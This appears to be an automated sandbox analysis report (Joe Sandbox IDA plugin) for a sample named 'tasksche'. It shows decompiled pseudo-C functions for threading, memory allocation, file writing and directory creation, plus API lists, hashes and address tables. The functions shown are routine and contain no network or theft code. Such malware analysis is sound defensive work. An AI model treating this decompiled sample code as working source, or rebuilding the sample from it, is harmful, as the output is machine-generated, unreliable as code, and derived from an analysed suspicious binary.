                                                                                              0x00408259
                                                                                              0x00408260
                                                                                              0x00408286
                                                                                              0x0040828c
                                                                                              0x004083a0
                                                                                              0x004083a0
                                                                                              0x00000000
                                                                                              0x004083a0
                                                                                              0x00408292
                                                                                              0x00408295
                                                                                              0x0040829b
                                                                                              0x00408321
                                                                                              0x0040832a
                                                                                              0x0040832f
                                                                                              0x00408332
                                                                                              0x00408339
                                                                                              0x0040833d
                                                                                              0x00408345
                                                                                              0x00408345
                                                                                              0x0040834c
                                                                                              0x0040834c
                                                                                              0x0040834f
                                                                                              0x00408357
                                                                                              0x00408359
                                                                                              0x00408366
                                                                                              0x00408366
                                                                                              0x0040836e
                                                                                              0x0040836e
                                                                                              0x00408379
                                                                                              0x0040837e
                                                                                              0x00408397
                                                                                              0x0040839c
                                                                                              0x0040839c
                                                                                              0x00000000
                                                                                              0x0040837e
                                                                                              0x0040833f
                                                                                              0x00408343
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00408343
                                                                                              0x004082af
                                                                                              0x004082b4
                                                                                              0x004082bc
                                                                                              0x004082db
                                                                                              0x004082ea
                                                                                              0x004082f5
                                                                                              0x004082fa
                                                                                              0x0040830f
                                                                                              0x00408311
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004082c9
                                                                                              0x004082cb
                                                                                              0x004082d1
                                                                                              0x004082d4
                                                                                              0x004082d4
                                                                                              0x0040831c
                                                                                              0x0040831e
                                                                                              0x00000000
                                                                                              0x0040831e
                                                                                              0x0040826f
                                                                                              0x0040827c
                                                                                              0x0040827c
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00408210
                                                                                                • Part of subcall function 00401822: __EH_prolog.LIBCMT ref: 00401827
                                                                                                • Part of subcall function 00401822: _memset.LIBCMT ref: 0040196A
                                                                                                • Part of subcall function 00401822: _memset.LIBCMT ref: 00401979
                                                                                                • Part of subcall function 00401822: _memset.LIBCMT ref: 00401988
                                                                                                • Part of subcall function 00401417: __EH_prolog.LIBCMT ref: 0040141C
                                                                                              • _wcscpy.LIBCMT ref: 004082AF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog_memset$_wcscpy
                                                                                              • String ID: rar
                                                                                              • API String ID: 2876264062-1792618458
                                                                                              • Opcode ID: d8064b72c640e36a82a0b68421302acdf3e8c056939b4e9f8210efc5c70c758b
                                                                                              • Instruction ID: 75000dcce843433d4275637ef0618472c828e59e125cdaf0ff5f97d994d1ab7f
                                                                                              • Opcode Fuzzy Hash: d8064b72c640e36a82a0b68421302acdf3e8c056939b4e9f8210efc5c70c758b
                                                                                              • Instruction Fuzzy Hash: 3D41A4319002589EDB24DB50C955BEA77B8AB14304F4448FFE489B3182DB796FC8CB29
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 69%
                                                                                              			E00411254() {
                                                                                              				void* __ecx;
                                                                                              				void* _t5;
                                                                                              				void* _t7;
                                                                                              				int _t8;
                                                                                              				void* _t13;
                                                                                              				void** _t20;
                                                                                              				void* _t23;
                                                                                              				void* _t24;
                                                                                              
                                                                                              				_t23 = 0;
                                                                                              				if( *0x4335ac > 0) {
                                                                                              					_t20 = 0x4335b0;
                                                                                              					do {
                                                                                              						_t7 = CreateThread(0, 0x10000, E004111DD, 0x4335ac, 0, _t24 + 0x10); // executed
                                                                                              						_t13 = _t7;
                                                                                              						if(_t13 == 0) {
                                                                                              							_push(L"CreateThread failed");
                                                                                              							_push(0x4335ac);
                                                                                              							E00401000(E00406423(0x4335ac));
                                                                                              							E00406371(0x4335ac, 2);
                                                                                              						}
                                                                                              						 *_t20 = _t13;
                                                                                              						 *0x00433630 =  *((intOrPtr*)(0x433630)) + 1;
                                                                                              						_t8 =  *0x44f58c; // 0x0
                                                                                              						if(_t8 != 0) {
                                                                                              							_t8 = SetThreadPriority( *_t20, _t8);
                                                                                              						}
                                                                                              						_t23 = _t23 + 1;
                                                                                              						_t20 =  &(_t20[1]);
                                                                                              					} while (_t23 <  *0x4335ac);
                                                                                              					return _t8;
                                                                                              				}
                                                                                              				return _t5;
                                                                                              			}











                                                                                              0x00411259
                                                                                              0x0041125d
                                                                                              0x00411261
                                                                                              0x00411264
                                                                                              0x00411278
                                                                                              0x0041127e
                                                                                              0x00411282
                                                                                              0x00411284
                                                                                              0x00411289
                                                                                              0x0041129a
                                                                                              0x004112a6
                                                                                              0x004112a6
                                                                                              0x004112ab
                                                                                              0x004112ad
                                                                                              0x004112b3
                                                                                              0x004112ba
                                                                                              0x004112bf
                                                                                              0x004112bf
                                                                                              0x004112c5
                                                                                              0x004112c6
                                                                                              0x004112c9
                                                                                              0x00000000
                                                                                              0x004112ce
                                                                                              0x004112d2

                                                                                              APIs
                                                                                              • CreateThread.KERNELBASE ref: 00411278
                                                                                              • SetThreadPriority.KERNEL32(?,00000000,?,?,004112E4,-00000108,00404FE0), ref: 004112BF
                                                                                                • Part of subcall function 00406423: __vswprintf_c_l.LIBCMT ref: 00406441
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                              • String ID: CreateThread failed
                                                                                              • API String ID: 2655393344-3849766595
                                                                                              • Opcode ID: 3061c48cbf7df5314d67cb84a6f78a2ab06f9f7c5b99b3b88179035cff10f0ee
                                                                                              • Instruction ID: 964536ca15170dd961cb9332306e5bd8003a90b1d1e662a5f33448d65f1dc838
                                                                                              • Opcode Fuzzy Hash: 3061c48cbf7df5314d67cb84a6f78a2ab06f9f7c5b99b3b88179035cff10f0ee
                                                                                              • Instruction Fuzzy Hash: 4B01A2753453057BD3215F55AC46BB673A9EB44766F20043FFB82E11D0DAB4A8608A2D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 94%
                                                                                              			E004126F0(void* __ecx, unsigned int _a4, char _a8, char _a11) {
                                                                                              				signed int _v8;
                                                                                              				char _v20;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* __ebp;
                                                                                              				unsigned int _t37;
                                                                                              				signed int _t39;
                                                                                              				intOrPtr _t41;
                                                                                              				signed int _t44;
                                                                                              				signed int _t50;
                                                                                              				unsigned int _t53;
                                                                                              				void* _t59;
                                                                                              				void* _t64;
                                                                                              				signed int _t65;
                                                                                              				signed int* _t67;
                                                                                              				intOrPtr* _t69;
                                                                                              				void* _t74;
                                                                                              
                                                                                              				_t53 = _a4;
                                                                                              				_t74 = __ecx;
                                                                                              				if(_t53 == 0) {
                                                                                              					E004063CE(0x4335ac);
                                                                                              				}
                                                                                              				_t37 = 0x40000;
                                                                                              				if(_t53 < 0x40000) {
                                                                                              					_t53 = 0x40000;
                                                                                              					_a4 = 0x40000;
                                                                                              				}
                                                                                              				if(_t53 >  *(_t74 + 0xe6d8)) {
                                                                                              					_t37 = _t53 >> 0x10;
                                                                                              					if(_t37 <= 0x10000) {
                                                                                              						if(_a8 == 0 ||  *(_t74 + 0x4b34) == 0 &&  *((char*)(_t74 + 0x4c38)) == 0) {
                                                                                              							L11:
                                                                                              							_a11 = 0;
                                                                                              							goto L12;
                                                                                              						} else {
                                                                                              							_a11 = 1;
                                                                                              							if( *((char*)(_t74 + 0x4c38)) == 0) {
                                                                                              								L12:
                                                                                              								_push(_t67);
                                                                                              								if( *((char*)(_t74 + 0x4c38)) == 0) {
                                                                                              									_t39 = E0041CF3E(_t53, _t64, _t67, _t53); // executed
                                                                                              									_v8 = _t39;
                                                                                              									__eflags = _t39;
                                                                                              									if(__eflags != 0) {
                                                                                              										L20:
                                                                                              										if( *((char*)(_t74 + 0x4c38)) != 0) {
                                                                                              											L27:
                                                                                              											 *(_t74 + 0xe6d8) = _t53;
                                                                                              											 *((intOrPtr*)(_t74 + 0xe6dc)) = _t53 - 1;
                                                                                              											return _t39;
                                                                                              										}
                                                                                              										E0041A820(_t67, _v8, 0, _t53);
                                                                                              										if(_a11 == 0) {
                                                                                              											L24:
                                                                                              											_t69 = _t74 + 0x4b34;
                                                                                              											_t41 =  *_t69;
                                                                                              											_t94 = _t41;
                                                                                              											if(_t41 != 0) {
                                                                                              												_push(_t41);
                                                                                              												E0041A506(_t53, _t69, _t74, _t94);
                                                                                              											}
                                                                                              											_t39 = _v8;
                                                                                              											 *_t69 = _t39;
                                                                                              											goto L27;
                                                                                              										}
                                                                                              										_t59 = 1;
                                                                                              										if( *(_t74 + 0xe6d8) < 1) {
                                                                                              											goto L24;
                                                                                              										} else {
                                                                                              											goto L23;
                                                                                              										}
                                                                                              										do {
                                                                                              											L23:
                                                                                              											_t44 =  *((intOrPtr*)(_t74 + 0x70)) - _t59;
                                                                                              											_t65 = _t53 - 1;
                                                                                              											_t53 = _a4;
                                                                                              											_t59 = _t59 + 1;
                                                                                              											 *((char*)((_t65 & _t44) + _v8)) =  *((intOrPtr*)(( *(_t74 + 0xe6d8) - 0x00000001 & _t44) +  *(_t74 + 0x4b34)));
                                                                                              										} while (_t59 <=  *(_t74 + 0xe6d8));
                                                                                              										goto L24;
                                                                                              									}
                                                                                              									L15:
                                                                                              									if(_a11 != 0 || _t53 < 0x1000000) {
                                                                                              										goto L10;
                                                                                              									} else {
                                                                                              										_t67 = _t74 + 0x4b34;
                                                                                              										_t50 =  *_t67;
                                                                                              										_t88 = _t50;
                                                                                              										if(_t50 != 0) {
                                                                                              											_push(_t50);
                                                                                              											E0041A506(_t53, _t67, _t74, _t88);
                                                                                              											 *_t67 =  *_t67 & 0x00000000;
                                                                                              										}
                                                                                              										_t39 = E0041254D(_t74 + 0x4b38, _t53);
                                                                                              										 *((char*)(_t74 + 0x4c38)) = 1;
                                                                                              										goto L20;
                                                                                              									}
                                                                                              								}
                                                                                              								_v8 = _v8 & 0x00000000;
                                                                                              								goto L15;
                                                                                              							}
                                                                                              							L10:
                                                                                              							E0041216A( &_v20);
                                                                                              							E0041C77F( &_v20, 0x42d504);
                                                                                              							goto L11;
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				return _t37;
                                                                                              			}





















                                                                                              0x004126f7
                                                                                              0x004126fb
                                                                                              0x004126ff
                                                                                              0x00412706
                                                                                              0x00412706
                                                                                              0x0041270b
                                                                                              0x00412712
                                                                                              0x00412714
                                                                                              0x00412716
                                                                                              0x00412716
                                                                                              0x0041271f
                                                                                              0x00412727
                                                                                              0x0041272f
                                                                                              0x00412739
                                                                                              0x00412770
                                                                                              0x00412770
                                                                                              0x00000000
                                                                                              0x0041274d
                                                                                              0x00412754
                                                                                              0x00412758
                                                                                              0x00412774
                                                                                              0x0041277b
                                                                                              0x0041277c
                                                                                              0x00412785
                                                                                              0x0041278b
                                                                                              0x0041278e
                                                                                              0x00412790
                                                                                              0x004127c9
                                                                                              0x004127d0
                                                                                              0x00412837
                                                                                              0x00412837
                                                                                              0x0041283e
                                                                                              0x00000000
                                                                                              0x00412844
                                                                                              0x004127d8
                                                                                              0x004127e4
                                                                                              0x0041281f
                                                                                              0x0041281f
                                                                                              0x00412825
                                                                                              0x00412827
                                                                                              0x00412829
                                                                                              0x0041282b
                                                                                              0x0041282c
                                                                                              0x00412831
                                                                                              0x00412832
                                                                                              0x00412835
                                                                                              0x00000000
                                                                                              0x00412835
                                                                                              0x004127e8
                                                                                              0x004127ef
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004127f1
                                                                                              0x004127f1
                                                                                              0x004127fa
                                                                                              0x004127ff
                                                                                              0x00412802
                                                                                              0x00412813
                                                                                              0x00412814
                                                                                              0x00412817
                                                                                              0x00000000
                                                                                              0x004127f1
                                                                                              0x00412792
                                                                                              0x00412796
                                                                                              0x00000000
                                                                                              0x004127a0
                                                                                              0x004127a0
                                                                                              0x004127a6
                                                                                              0x004127a8
                                                                                              0x004127aa
                                                                                              0x004127ac
                                                                                              0x004127ad
                                                                                              0x004127b2
                                                                                              0x004127b5
                                                                                              0x004127bd
                                                                                              0x004127c2
                                                                                              0x00000000
                                                                                              0x004127c2
                                                                                              0x00412796
                                                                                              0x0041277e
                                                                                              0x00000000
                                                                                              0x0041277e
                                                                                              0x0041275a
                                                                                              0x0041275d
                                                                                              0x0041276b
                                                                                              0x00000000
                                                                                              0x0041276b
                                                                                              0x00412739
                                                                                              0x0041272f
                                                                                              0x00412848

                                                                                              APIs
                                                                                              • __CxxThrowException@8.LIBCMT ref: 0041276B
                                                                                              • _malloc.LIBCMT ref: 00412785
                                                                                                • Part of subcall function 0041CF3E: __FF_MSGBANNER.LIBCMT ref: 0041CF61
                                                                                                • Part of subcall function 0041CF3E: __NMSG_WRITE.LIBCMT ref: 0041CF68
                                                                                                • Part of subcall function 0041CF3E: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,004212F4,00000000,00000001,00000000,?,0041EF2D,00000018,0042D930,0000000C,0041EFBE), ref: 0041CFB5
                                                                                              • _memset.LIBCMT ref: 004127D8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateException@8HeapThrow_malloc_memset
                                                                                              • String ID:
                                                                                              • API String ID: 3965744532-0
                                                                                              • Opcode ID: 9a5626d063f902226345b1e3bd7973a083b583a89a09867b0a04f46aed37c533
                                                                                              • Instruction ID: 1154a5c9599e5537b836a1002f89e902606abe80a59ae87693d08389c363c3d7
                                                                                              • Opcode Fuzzy Hash: 9a5626d063f902226345b1e3bd7973a083b583a89a09867b0a04f46aed37c533
                                                                                              • Instruction Fuzzy Hash: 05410470905745ABEB25EE38D6C47DBB7D0AF14304F20482FE5A6D3281C7B8A9E4C718
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 91%
                                                                                              			E00408AA9(intOrPtr* __ecx, void* __edx, void* _a4, long _a8) {
                                                                                              				long _v8;
                                                                                              				char _t28;
                                                                                              				long _t33;
                                                                                              				long _t34;
                                                                                              				int _t37;
                                                                                              				void* _t38;
                                                                                              				char _t43;
                                                                                              				intOrPtr _t48;
                                                                                              				long _t56;
                                                                                              				void* _t61;
                                                                                              				struct _OVERLAPPED* _t63;
                                                                                              				intOrPtr* _t68;
                                                                                              
                                                                                              				_t61 = __edx;
                                                                                              				_push(__ecx);
                                                                                              				_t68 = __ecx;
                                                                                              				if(_a8 != 0) {
                                                                                              					if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
                                                                                              						 *(_t68 + 4) = GetStdHandle(0xfffffff5);
                                                                                              					}
                                                                                              					while(1) {
                                                                                              						_t63 = 0;
                                                                                              						_t43 = 0;
                                                                                              						_v8 = 0;
                                                                                              						if( *((intOrPtr*)(_t68 + 0xc)) == 0) {
                                                                                              							goto L12;
                                                                                              						}
                                                                                              						if(_a8 <= 0) {
                                                                                              							L14:
                                                                                              							if( *((char*)(_t68 + 0x14)) == 0 ||  *((intOrPtr*)(_t68 + 0xc)) != 0) {
                                                                                              								L21:
                                                                                              								_t28 = _t43;
                                                                                              								 *((char*)(_t68 + 8)) = 1;
                                                                                              								L22:
                                                                                              								return _t28;
                                                                                              							} else {
                                                                                              								if(E00406336(0x4335ac, _t68 + 0x1e, 0) == 0) {
                                                                                              									E004064F3(0x4335ac, 0, _t68 + 0x1e);
                                                                                              									goto L21;
                                                                                              								}
                                                                                              								_t33 = _v8;
                                                                                              								if(_t33 < _a8 && _t33 > 0) {
                                                                                              									_t48 =  *_t68;
                                                                                              									_t38 =  *((intOrPtr*)(_t48 + 0x10))(0);
                                                                                              									asm("sbb edx, edi");
                                                                                              									 *((intOrPtr*)(_t48 + 0xc))(_t38 - _v8, _t61);
                                                                                              								}
                                                                                              								continue;
                                                                                              							}
                                                                                              						} else {
                                                                                              							goto L7;
                                                                                              						}
                                                                                              						while(1) {
                                                                                              							L7:
                                                                                              							_t56 = _a8 - _t63;
                                                                                              							_t34 = 0x4000;
                                                                                              							if(_t56 < 0x4000) {
                                                                                              								_t34 = _t56;
                                                                                              							}
                                                                                              							_t37 = WriteFile( *(_t68 + 4), _a4 + _t63, _t34,  &_v8, 0);
                                                                                              							asm("sbb bl, bl");
                                                                                              							_t43 =  ~(_t37 - 1) + 1;
                                                                                              							if(_t43 == 0) {
                                                                                              								goto L14;
                                                                                              							}
                                                                                              							_t63 = _t63 + 0x4000;
                                                                                              							if(_t63 < _a8) {
                                                                                              								continue;
                                                                                              							}
                                                                                              							L13:
                                                                                              							if(_t43 != 0) {
                                                                                              								goto L21;
                                                                                              							}
                                                                                              							goto L14;
                                                                                              						}
                                                                                              						goto L14;
                                                                                              						L12:
                                                                                              						WriteFile( *(_t68 + 4), _a4, _a8,  &_v8, 0); // executed
                                                                                              						asm("sbb bl, bl");
                                                                                              						_t43 = 1;
                                                                                              						goto L13;
                                                                                              					}
                                                                                              				}
                                                                                              				_t28 = 1;
                                                                                              				goto L22;
                                                                                              			}















                                                                                              0x00408aa9
                                                                                              0x00408aac
                                                                                              0x00408ab2
                                                                                              0x00408ab4
                                                                                              0x00408ac1
                                                                                              0x00408acb
                                                                                              0x00408acb
                                                                                              0x00408ad0
                                                                                              0x00408ad0
                                                                                              0x00408ad2
                                                                                              0x00408ad4
                                                                                              0x00408ada
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00408adf
                                                                                              0x00408b40
                                                                                              0x00408b44
                                                                                              0x00408ba1
                                                                                              0x00408ba2
                                                                                              0x00408ba4
                                                                                              0x00408ba9
                                                                                              0x00408bab
                                                                                              0x00408b4c
                                                                                              0x00408b60
                                                                                              0x00408b9c
                                                                                              0x00000000
                                                                                              0x00408b9c
                                                                                              0x00408b62
                                                                                              0x00408b68
                                                                                              0x00408b76
                                                                                              0x00408b7c
                                                                                              0x00408b86
                                                                                              0x00408b8c
                                                                                              0x00408b8c
                                                                                              0x00000000
                                                                                              0x00408b68
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00408ae1
                                                                                              0x00408ae1
                                                                                              0x00408ae4
                                                                                              0x00408ae6
                                                                                              0x00408aed
                                                                                              0x00408aef
                                                                                              0x00408aef
                                                                                              0x00408b01
                                                                                              0x00408b0c
                                                                                              0x00408b0e
                                                                                              0x00408b10
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00408b12
                                                                                              0x00408b1b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00408b3c
                                                                                              0x00408b3e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00408b3e
                                                                                              0x00000000
                                                                                              0x00408b1f
                                                                                              0x00408b2d
                                                                                              0x00408b38
                                                                                              0x00408b3a
                                                                                              0x00000000
                                                                                              0x00408b3a
                                                                                              0x00408ad0
                                                                                              0x00408ab6
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F5,?,?,?,0040BB41,?,?,00000000,?,?,004124ED,?,?,?,00000001,?), ref: 00408AC5
                                                                                              • WriteFile.KERNEL32(00000001,?,00004000,?,00000000,?,?,0040BB41,?,?,00000000,?,?,004124ED,?,?), ref: 00408B01
                                                                                              • WriteFile.KERNELBASE(00000001,?,00000000,?,00000000,?,?,?,?,?,0040BB41,?,?,00000000,?,?), ref: 00408B2D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite$Handle
                                                                                              • String ID:
                                                                                              • API String ID: 4209713984-0
                                                                                              • Opcode ID: 2630e5a33cfd0af18d09aa74bbfd8346207367a51011a650ef626fa881f46d74
                                                                                              • Instruction ID: f20fcf70e75a5c6d44a32b1c4255a65a5bf54a4d93884812af3801fc7a684339
                                                                                              • Opcode Fuzzy Hash: 2630e5a33cfd0af18d09aa74bbfd8346207367a51011a650ef626fa881f46d74
                                                                                              • Instruction Fuzzy Hash: 9B31C371300204AFDB209F65CA44BAB77A9EB94310F04813FF996E72C1DB78A905DF29
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E004092C9(void* __eflags, WCHAR* _a4, char _a8, intOrPtr _a12) {
                                                                                              				short _v4100;
                                                                                              				signed int _t9;
                                                                                              				long _t11;
                                                                                              				void* _t12;
                                                                                              				int _t21;
                                                                                              				WCHAR* _t22;
                                                                                              				void* _t24;
                                                                                              
                                                                                              				_t24 = __eflags;
                                                                                              				E0041AAF0(0x1000);
                                                                                              				_t22 = _a4;
                                                                                              				_t9 =  *(E0040A08A(_t24, _t22)) & 0x0000ffff;
                                                                                              				if(_t9 == 0x2e || _t9 == 0x20) {
                                                                                              					L3:
                                                                                              					if(E004092A5(_t22) != 0 || E0040A3DC(_t22,  &_v4100, 0x800) == 0 || CreateDirectoryW( &_v4100, 0) == 0) {
                                                                                              						_t11 = GetLastError();
                                                                                              						__eflags = _t11 - 2;
                                                                                              						if(_t11 == 2) {
                                                                                              							L12:
                                                                                              							_t12 = 2;
                                                                                              							return _t12;
                                                                                              						}
                                                                                              						__eflags = _t11 - 3;
                                                                                              						if(_t11 == 3) {
                                                                                              							goto L12;
                                                                                              						}
                                                                                              						return 1;
                                                                                              					} else {
                                                                                              						goto L6;
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t21 = CreateDirectoryW(_t22, 0); // executed
                                                                                              					if(_t21 != 0) {
                                                                                              						L6:
                                                                                              						if(_a8 != 0) {
                                                                                              							E0040908D(_t22, _a12);
                                                                                              						}
                                                                                              						return 0;
                                                                                              					}
                                                                                              					goto L3;
                                                                                              				}
                                                                                              			}










                                                                                              0x004092c9
                                                                                              0x004092d1
                                                                                              0x004092d8
                                                                                              0x004092e1
                                                                                              0x004092ee
                                                                                              0x004092ff
                                                                                              0x00409307
                                                                                              0x00409341
                                                                                              0x00409347
                                                                                              0x0040934a
                                                                                              0x00409356
                                                                                              0x00409358
                                                                                              0x00000000
                                                                                              0x00409358
                                                                                              0x0040934c
                                                                                              0x0040934f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004092f6
                                                                                              0x004092f9
                                                                                              0x004092fd
                                                                                              0x0040932e
                                                                                              0x00409332
                                                                                              0x00409338
                                                                                              0x00409338
                                                                                              0x00000000
                                                                                              0x0040933d
                                                                                              0x00000000
                                                                                              0x004092fd

                                                                                              APIs
                                                                                                • Part of subcall function 0040A08A: _wcslen.LIBCMT ref: 0040A090
                                                                                              • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,?,?,?,0040941E,?,00000001,00000000,?,?,?,?,?), ref: 004092F9
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,?,00000800,00000000,00000000,?,?,?,0040941E,?,00000001,00000000,?,?), ref: 00409328
                                                                                              • GetLastError.KERNEL32(00000000,00000000,?,?,?,0040941E,?,00000001,00000000,?,?,?,?,?,?,004067A5), ref: 00409341
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2260680371-0
                                                                                              • Opcode ID: e440fb91986ed667ecea05b8623b67f22d0563812c7c3dc4cd5ad5119d8de580
                                                                                              • Instruction ID: 5cfd1deac55777c6f3d5c0bdf32a3cf990456680eccb4e8d5c114054f7fd3324
                                                                                              • Opcode Fuzzy Hash: e440fb91986ed667ecea05b8623b67f22d0563812c7c3dc4cd5ad5119d8de580
                                                                                              • Instruction Fuzzy Hash: DD01C031100204A5DB216A664C42BBB37589B4EB84F88447BFD41F62D2CB7C9C92D97E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 90%
                                                                                              			E0040E2D7(void* __ecx, void* __edx, void* __eflags) {
                                                                                              				intOrPtr _t20;
                                                                                              				void* _t25;
                                                                                              				void* _t39;
                                                                                              				void* _t45;
                                                                                              				intOrPtr _t47;
                                                                                              
                                                                                              				_t39 = __edx;
                                                                                              				E0041A4DC(E00429794, _t45);
                                                                                              				_push(__ecx);
                                                                                              				E0041AAF0(0x6460);
                                                                                              				 *((intOrPtr*)(_t45 - 0x10)) = _t47;
                                                                                              				E0041A7F7(0x44ac32, "X");
                                                                                              				E00410D16(0x44cc54, 0x42a570);
                                                                                              				E0041A7F7(0x44bc52,  *((intOrPtr*)(_t45 + 0xc)));
                                                                                              				E0040537E(0x443980,  *((intOrPtr*)(_t45 + 0xc)));
                                                                                              				_t4 = _t45 - 4;
                                                                                              				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
                                                                                              				_t20 = 4;
                                                                                              				 *0x449c14 = _t20;
                                                                                              				 *0x449c10 = _t20;
                                                                                              				 *0x449c0c = _t20;
                                                                                              				 *0x448ad3 =  *0x441823;
                                                                                              				_push(0x443980);
                                                                                              				 *0x448b08 = 1;
                                                                                              				 *0x448b0b = 1;
                                                                                              				 *0x448ad4 =  *0x441822; // executed
                                                                                              				E00407150(_t45 - 0x6470, _t39,  *_t4); // executed
